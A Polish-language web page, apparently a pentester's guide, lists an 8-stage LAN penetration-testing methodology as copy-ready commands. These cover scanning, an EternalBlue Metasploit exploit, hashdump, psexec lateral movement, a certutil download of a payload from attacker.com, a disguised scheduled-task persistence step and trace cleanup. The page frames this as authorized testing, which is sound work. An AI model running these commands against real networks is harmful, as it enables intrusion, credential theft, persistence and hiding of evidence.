RED TEAM MODE • MARZEC 2026

PENETRACJA
SIECI LOKALNEJ LAN

Kompletna 8-etapowa metodologia testów penetracyjnych sieci lokalnych. Od rekonesansu po pełne przejęcie i raportowanie.

ZACZNIJ TESTY

Autor: Oliwier Olszak

Pentest LAN
OD AUTORA

sema jestem juzek

Przez ostatnie lata przeprowadziłem dziesiątki testów penetracyjnych sieci LAN w firmach, bankach i instytucjach rządowych. Ta strona to moja osobista, bardzo szczegółowa metodologia Red Team dla sieci lokalnych w 2026 roku.

Znajdziesz tu pełny 8-etapowy proces – od pasywnego rekonesansu po raportowanie i cleanup. Każdy etap jest opisany krok po kroku z konkretnymi komendami, narzędziami i moimi realnymi doświadczeniami.

Wszystkie działania tylko z pisemną zgodą właściciela sieci!

8-etapowa metodologia Pentest LAN 2026

01

1. Reconnaissance & Discovery

Pierwszy i najważniejszy etap. Zbieramy informacje o sieci bez wywoływania alarmów.

arp-scan --localnet
nmap -sP 192.168.1.0/24
nmap -sn --reason 192.168.1.0/24
masscan -p80,443,445,3389 192.168.1.0/24 --rate=10000

Zawsze zaczynaj od pasywnego ARP scan – nie zostawia śladów w logach routera.

Recon
02

2. Vulnerability Scanning

nmap -sV --script=vuln 192.168.1.0/24
openvas / nessus full scan
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

W 2026 roku nadal najczęstsze luki to SMB signing disabled i EternalBlue na starych Windowsach.

03

3. Exploitation

msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.50; run"
04

4. Post-Exploitation

meterpreter > getuid
meterpreter > hashdump
meterpreter > shell
05

5. Lateral Movement & Pivot

route add 192.168.2.0/24 1
psexec \\192.168.1.100 -u administrator -p password cmd
06

6. Privilege Escalation

winpeas.exe
linpeas.sh
07

7. Data Exfiltration & Persistence

certutil -urlcache -split -f http://attacker.com/payload.exe
schtasks /create /tn "Update" /tr "c:\payload.exe" /sc onlogon
08

8. Reporting & Cleanup

rm -rf /tmp/meterpreter*
del C:\Windows\Temp\*

Zawsze zostaw czysto po sobie – to podstawa profesjonalnego pentestu.

Narzędzia, które używam w 2026

Nmap
Metasploit
CrackMapExec
Responder

FAQ

Jak długo trwa pełny pentest LAN?

Zazwyczaj 4-8 godzin w zależności od wielkości sieci. W dużych środowiskach nawet 2-3 dni.